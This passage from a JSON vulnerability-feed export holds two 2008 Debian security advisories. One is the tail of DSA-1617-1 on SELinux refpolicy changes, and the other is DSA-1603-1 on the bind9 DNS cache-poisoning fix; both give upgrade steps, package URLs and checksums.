where the previous\nversion of refpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with\npolicy module upgradeability in mind, and because SELinux-enabled\nDebian systems often have some degree of site-specific policy\ncustomization, it is difficult to assure that the new bind policy can\nbe successfully upgraded. To this end, the package upgrade will not\nabort if the bind policy update fails. The new policy module can be\nfound at /usr/share/selinux/refpolicy-targeted/bind.pp after\ninstallation. Administrators wishing to use the bind service policy\ncan reconcile any policy incompatibilities and install the upgrade\nmanually thereafter. A more detailed discussion of the corrective\nprocedure may be found here:\n\n http://wiki.debian.org/SELinux/Issues/BindPortRandomization\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.0.20061018-5.1+etch1. The unstable distribution (sid) is\nnot affected, as subsequent refpolicy releases have incorporated an\nanalogous change.\n\nWe recommend that you upgrade your refpolicy packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018.orig.tar.gz\n Size/MD5 checksum: 571487 1bb326ee1b8aea1fa93c3bd86a3007ee\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018-5.1+etch1.diff.gz\n Size/MD5 checksum: 53515 bd171f0cfa9adc59d451d176fb32c913\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018-5.1+etch1.dsc\n Size/MD5 checksum: 859 52bc8ea0cab864e990e9dacc4db3b678\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-strict_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 1541610 626c93fc13beaa01ff151d9103a7860b\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-doc_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 289230 b082a861eda93f9bc06dd2e2f03ba89d\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-targeted_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 1288314 c00ed4f0ea4ddbb8dd945c24c710c788\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-src_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 595490 841f616c8f08b22ed7077c21c1065026\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-dev_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 418666 bee3f41fe8771b7b88693937814494a3\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 3, "modified": "2008-07-25T06:29:42", "published": "2008-07-25T06:29:42", "id": "DEBIAN:DSA-1617-1:2477C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00201.html", "title": "[SECURITY] [DSA 1617-1] New refpolicy packages fix incompatible policy", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-11T13:19:47", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1603-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian&#x27;s BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nNote that this security update changes BIND network behavior in a\nfundamental way, and the following steps are recommended to ensure a\nsmooth upgrade.\n\n\n1. Make sure that your network configuration is compatible with source\nport randomization. If you guard your resolver with a stateless packet\nfilter, you may need to make sure that no non-DNS services listen on on\nthe 1024--65535 UDP port range and open it at the packet filter. For\ninstance, packet filters based on etch&#x27;s Linux 2.6.18 kernel only\nsupport stateless filtering of IPv6 packets, and are therefore pose this\nadditional difficulty. (If you use IPv4 with iptables and ESTABLISHED\nrules, networking changes are likely not required.)\n\n2. Install the BIND 9 upgrade, using &quot;apt-get update&quot; followed by\n&quot;apt-get install bind9&quot;. Verify that the named process has been\nrestarted and answers recursive queries. (If all queries result in\ntimeouts, this indicates that networking changes are necessary; see the\nfirst step.)\n\n3. Verify that source port randomization is active. Check that the\n/var/log/daemon.log file does not contain messages of the following\nform\n\n named[6106]: /etc/bind/named.conf.options:28: using specific\n query-source port suppresses port randomization and can be insecure.\n\nright after the &quot;listening on IPv6 interface&quot; and &quot;listening on IPv4\ninterface&quot; messages logged by BIND upon startup. If these messages are\npresent, you should remove the indicated lines from the configuration,\nor replace the port numbers contained within them with &quot;*&quot; sign (e.g.,\nreplace &quot;port 53&quot; with &quot;port *&quot;).\n\nFor additional certainty, use tcpdump or some other network monitoring\ntool to check for varying UDP source ports. If there is a NAT device\nin front of your resolver, make sure that it does not defeat the\neffect of source port randomization.\n\n4. If you cannot activate source port randomization, consider\nconfiguring BIND 9 to forward queries to a resolver which can, possibly\nover a VPN such as OpenVPN to create the necessary trusted network link.\n(Use BIND&#x27;s forward-only mode in this case.)\n\n\nOther caching resolvers distributed by Debian (PowerDNS, MaraDNS,\nUnbound) already employ source port randomization, and no updated\npackages are needed. BIND 9.5 up to and including version\n1:9.5.0.dfsg-4 only implements a weak form of source port\nrandomization and needs to be updated as well. For information on\nBIND 8, see DSA-1604-1, and for the status of the libc stub resolver,\nsee DSA-1605-1.\n\nThe updated bind9 packages contain changes originally scheduled for\nthe next stable point release, including the changed IP address of\nL.ROOT-SERVERS.NET (Debian bug #449148).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.dsc\n Size/MD5 checksum: 897 aeb15f8babb1e6e38367b9f19fea87da\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz\n Size/MD5 checksum: 4043577 198181d47c58a0a9c0265862cd5557b0\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.diff.gz\n Size/MD5 checksum: 302126 521abea46b1104f2251cc398f30af303\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch3_all.deb\n Size/MD5 checksum: 189560 46ff778db82d2e171d292ecac93ea9b6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 98154 bbdbcd3d0840f5ffcf4eaddf5a8c253f\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 1407380 ca8995875e76a25de6f32a47f62ea876\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 226088 93100774ae6da891caf9fa27a2134cdf\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 112616 bca5dcca8abff15f4f9cc911f9f94818\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 322286 677fdcf8e9a8c272a08ed47a79e09209\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 190084 87d64554a1cdde9f58cc850f7d5961a1\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 96508 48ba9fc0e884f093e95988bd4e088b9c\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 564862 7b23948d7c741d4f287698d28385ce71\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 188742 5dd8024a9864137f4529785fcc9c9231\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 116534 2e7dc9ea95bae40dc396ff504abb03bb\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 115784 b961fd6c797a2d1422ae588bfc25ed9d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 224294 4d33744bb92300b061cad41dd8de7ea5\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 1111932 e43ced7eae496d7835247a068bef4a66\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 190742 9e39ced5d3464594b9dda6ce683fc653\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 319008 e36a35983ebc5061e8669ef7f004a851\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 552414 c93c2863bddd5661010ae3472e210aa8\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 95922 f114eb76add0d7dabad1d082d38ccf08\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 117072 a70d1d96ea01aa24fb9642e09133824f\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 187646 70372cec3522356dcd00901ea64714d4\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 111270 6dc6edfcca9fecb28c7e66d31ab14a74\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 114722 905d0f9b7b5ebc0308c54158e71d03cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 96704 09d3c850f12a6c1f6eab4e800a118c87\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 107888 b2ea4933e233a1af8dd1e5ee641999a2\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 112714 27b1fde9b144cacb1ae06a441d7c5787\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 116076 cafc3294083de02518ab5fe0f0488c3b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 532206 a005bdff779fed950e4750231d0184b2\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 187364 72fdca60a20876be71b678028cefc316\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95752 bce98b259a2821d59f6e6b441b491d77\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 182950 26a15d51a4e6f1ea1dda99ab4d3ea34c\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 217686 97f538e27ab7c765b514a9ce59869a41\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95168 374d7f18915fc8eb6b775d272cf28f2e\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 1074498 fdada51888027e9c3e89961b31a48ded\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 311078 43d1c044b0cc81b072b8962ad3b8f019\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 96986 bba6d0a611b7088e284564b430f91405\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 97140 14f3dacd102208700660873637dea18b\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 185570 012eb78b091c0991988a95160df7d65d\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 115822 d717418b7ec770e5419e0941670eab19\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 543342 201331119c074430d503b68dc210e187\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 1258146 2f092d0708338d0a3ac8924218fee0d7\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 315070 bc8d94bec7b1c8cf80f64fb72d1f38e5\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 187942 1cd85afac13850d1807a5b50b9d3262f\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 114612 912dc2007ca7cb6097a3e6a4e98897e3\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 217378 49276452262a155ba17db2ad8c66e3e2\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 113466 428d268ce8ad5386c1af758ca4cff2ce\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 106034 ce4d4a024472317185d4c6492b7d30df\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 180292 1fd02a86a31b68a8db2407904495a0db\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94838 9dbc2734dd8b8bb7c3e7684faabea64e\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 206330 a22fb6cb47d6e449007d665b9e6d8c52\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 113162 b9bc5fa7f96313235a53ab6fd819b58b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 472708 9edfb07c186a93aea1a2e602e0ee6335\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94822 d2fc00416dc090a535b280f48eee7f46\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 169930 47c43c9738afb7ed72618930dc702ed3\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 296722 dd1979969210386fc36d119e19e12cc2\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 996528 56db22ee21e053443e72ccd11a25181b\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 110134 5491e4e33e43f1300840b62947690b7a\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 232052 eb9215cb2ba71ded815b4ca6f0ac0744\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 99978 ceee4c1dc16fdf2d7fefe1aee6d8dd85\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 393324 553b67ca638482db8e1586d231f03abe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 740264 a30c98b25296a147d47d7f44c8418883\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 127606 33d62368c2ce437e660708eb6b0ffe2b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 216344 0a0b33f34dbeb744bd8af8ad8388048f\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 125806 3aafce71b9e4ecaf01602c409a355b54\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 1584302 d982b4443c38056cdeb80b327ee36f3a\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 117782 ae8ae735a8054ff473d305b06c90c68a\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 102432 4443f6e43cc1e4c7448965a0501bfe54\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 280866 c20244c3a06177b934ac804b382b85c7\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 174012 cf61e15aa7c79b40ae94a3c1d08ba496\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 301476 4094fd919da162322ea07d62378cc664\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 110326 be73e626902012ca986d4192804017e7\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 180490 dde7f37a0a2456190461f5f26bf30ab6\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 1229398 37af92bf5074d9a260fd4ff5346dc4b8\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 211386 8083484e19ebc9099022954350c6baf7\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94992 46f858e2ed33a864539476d25bd9b44f\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94230 6bfa6b8d78c46567a341f6174f9aa874\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 491862 fc2d747a29c0116da5936b4964ef8146\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 113268 58fb17d2ee0415e13fdad4727534b6cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 107912 5834642a56bb9548510f8cd0a3ae766f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 299514 0b5de102f7ddf83d497498b320613556\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 488260 7b85b99ea5c24f74e531bbd9056672e9\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 1205384 a3211957988d4aaae40776ff41cf6a01\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 113016 dddd0a37c778cd68696318a7adc1abcd\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 110254 6754bc57fcac807b5569531f7e821802\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 174148 23e91bbb42a44ca80535079660813277\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 179630 fa26c51aa248cb502ac54544bdd6ced0\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 210904 21784fc7019a384e78ecc94a10f4e315\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94936 2068abe2f2e78675ad94ea28579efc87\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 107166 2cfce41a4fc41aa9986cdef01e09705d\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94098 c95a157cfa3feef62450afdef3fe65a8\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 173606 9618a781d59f94f751e18db86cf6b948\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 112276 e786724068250eb53c475a3e51035d51\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 113842 4961da1e75c17f3f00621acfc06d10fe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 488428 b777fc3fe13b319817f955f116b40e83\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 1167832 75f402f7bf328da5deee364f4266558d\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96204 57ec688c7f24161e347054dc93fbd757\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96170 77d5b9189a05f2b3dca7901bff6e56df\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 301276 dddf71278c1f4afbbc49019248f4328e\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 109288 8fd2b3005fcf95e3616ec8a77b3ad322\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 183310 b9eb85b58aaf29a3106d16410c0d379a\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 206830 b286690dde8d1412c2de3fa99f7d3c5b\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 114234 23a30b0e26db0210a1be48c4d44b6d7f\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 331864 7c3fab929f1e29873ecfc7c7c4b52ddc\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 116656 8abeeeb22e800f63e4b30e0c2dd974e0\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 1137342 820a17acdc24ef1dd0c1db7b8e6fc470\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 233948 635487d4e6ea4d15704bb14b8cf9236c\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 196598 2198086ee8c358aa3ed5046708a31f45\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 194704 c897d956b11161ae8e31e4bffb489883\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 118140 e5e11d59852a32dcd1b78b4aabd22fff\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 95664 050d558c3d06e520fb4e6c6cebd520c3\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 579484 6fc80f5cde0c2d01b49ae53f027eeecc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 97786 5dda64259aa80e1c2e085e7fc2430299\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 300090 21095a9477d8db8bdbca300235ddc296\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 210606 8bd074b427b5f732c5584ca265bb2c28\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 1121664 2750abf3a8e3ffa54d1b15f6a5b6738e\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94822 4e2634cf2561a237174a6863377b24cd\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 175248 4231a2791083fc82977535613d38ef2a\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 184036 aea98952994fb97c74df02ae4ed2f28d\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 107574 b6a3a3204c134d54dce2d8d79f77f647\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 493628 b5c5a9638091fd0d6543a405bfdefd53\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94828 4657a6a42f7f2fac5ef96d273e9de4df\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 114258 32f88744a6e6e648377dda42ff910cbb\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 111158 a59dbf1edb5518b09b2993049922c01a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 9, "modified": "2008-07-08T17:03:22", "published": "2008-07-08T17:03:22", "id": "DEBIAN:DSA-1603-1:C7E04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00184.html", "title": "[SECURITY] [DSA 1603-1] New bind9 